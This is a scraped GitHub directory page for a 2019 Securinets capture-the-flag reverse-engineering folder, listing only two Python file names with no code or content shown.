<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>5</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>25</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/acdwas/ctf/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":124655323,"originating_url":"https://github.com/acdwas/ctf/tree/master/2019/Securinets/rev","user_id":null}}" data-hydro-click-hmac="aa02098e3c71bb2b9804dc57efe327c1971026896914c5f7a81580ade241dfae"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/acdwas/ctf/refs" cache-key="v0:1675583418.5812821" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWNkd2FzL2N0Zg==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/acdwas/ctf/refs" cache-key="v0:1675583418.5812821" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWNkd2FzL2N0Zg==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf</span></span></span><span>/</span><span><span>2019</span></span><span>/</span><span><span>Securinets</span></span><span>/</span>rev<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf</span></span></span><span>/</span><span><span>2019</span></span><span>/</span><span><span>Securinets</span></span><span>/</span>rev<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/acdwas/ctf/tree-commit/773a121b9ebe30e8693ecf86a6231f1037b7b0a0/2019/Securinets/rev" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/acdwas/ctf/file-list/master/2019/Securinets/rev"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>Matrix_of_Hell!.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>RBOOM!.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
